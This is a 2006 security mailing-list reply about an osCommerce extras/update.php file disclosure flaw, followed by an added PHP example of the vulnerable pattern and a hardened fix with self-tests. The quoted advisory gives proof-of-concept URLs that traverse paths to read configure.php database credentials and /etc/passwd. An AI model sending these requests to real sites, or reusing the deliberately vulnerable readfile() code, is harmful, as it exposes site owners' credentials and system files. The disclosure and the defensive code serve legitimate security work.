RE: osCommerce "extras/" information/source code disclosure
Apr 15 2006 12:39PM
Michael Scheidell (scheidell secnap net)
> -----Original Message-----
> From: rgod (at) autistici (dot) org [email concealed] [mailto:rgod (at) autistici (dot) org [email concealed]]
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: osCommerce "extras/" information/source code disclosure
>
>
> ---- osCommerce <= 2.2 "extras/" information/source code
> disclosure ------------
>
> software site: http://www.oscommerce.com/
>
>
> if extras/ folder is placed inside the www path, you can see
> all files on target system, including php source code with
> database details, poc:
>
> http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
> http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
Amazing: this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?

http://sourceforge.net/mailarchive/message.php?msg_id=12318248
http://www.oscommerce.com/community/bugs,2835

For you snorters, rules have been posted to the snort-sigs and bleeding
mailing lists.
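The pattern behind the PoC URLs above, as an added example: this is neither code from the post nor osCommerce's actual extras/update.php. The "vulnerable" function is an assumption about what a script that serves a user-named readme file looks like when the parameter is passed straight to readfile(); the hardened resolve_readme(), its readme directory layout and the CLI self-check are my own and exist only to show the fix.

```php
<?php
// Added example, not osCommerce code. The vulnerable function is an assumed
// reconstruction of the pattern the advisory describes (query parameter ->
// readfile() with no validation); the hardened form is a drop-in replacement.

// Vulnerable pattern (assumed): "../catalog/includes/configure.php" or
// "/etc/passwd" is read and echoed verbatim, exactly like the PoC URLs.
function show_readme_vulnerable(string $readme_file): void
{
    readfile($readme_file);
}

// Hardened lookup: only plain file names inside a fixed readme directory are
// served; the request is checked before the filesystem is touched and again
// after canonicalisation, so traversal, absolute paths and symlinks all fail.
function resolve_readme(string $readme_dir, string $requested): ?string
{
    // 1. Plain file name only: no slashes, backslashes, NUL, '%' or whitespace.
    //    ".." on its own passes the regex, so it is rejected explicitly.
    if ($requested === ''
        || !preg_match('/^[A-Za-z0-9._-]+$/', $requested)
        || str_contains($requested, '..')) {
        return null;
    }
    // 2. Canonicalise both sides; realpath() is false for non-existent paths.
    $base = realpath($readme_dir);
    $path = realpath($readme_dir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. The resolved file must sit strictly below the base directory
    //    (defeats a symlink in the readme directory pointing elsewhere).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Web-facing wrapper: call as show_readme_hardened(__DIR__ . '/readmes',
// $_GET['readme_file'] ?? '') from the script that used to readfile() directly.
function show_readme_hardened(string $readme_dir, string $requested): void
{
    $path = resolve_readme($readme_dir, $requested);
    if ($path === null) {
        http_response_code(404);
        echo "no such readme\n";
        return;
    }
    header('Content-Type: text/plain');
    readfile($path);
}

// Self-check on a constructed directory (run with: php update_hardened.php).
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/readme_' . getmypid();
    mkdir($dir);
    file_put_contents("$dir/readme.txt", "ok\n");
    $cases = [
        'readme.txt'                        => true,   // legitimate request
        '../catalog/includes/configure.php' => false,  // the advisory's PoC
        '/etc/passwd'                       => false,  // absolute path PoC
        '..'                                => false,  // parent directory
        'readme.txt%00'                     => false,  // encoded NUL, fails regex
        'missing.txt'                       => false,  // realpath() is false
    ];
    foreach ($cases as $name => $expect_ok) {
        $ok = resolve_readme($dir, $name) !== null;
        printf("%-40s %s\n", $name, $ok === $expect_ok ? 'PASS' : 'FAIL');
    }
    unlink("$dir/readme.txt");
    rmdir($dir);
}
```

The name check before realpath() matters: realpath() follows the path on disk, so running it on attacker input alone still lets the request probe the filesystem (a distinguishable false for non-existent paths). Rejecting anything that is not a bare file name first means the only thing an attacker can learn is whether a readme of that name exists in the readme directory, which is the intended behaviour.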
Copyright 2010, SecurityFocus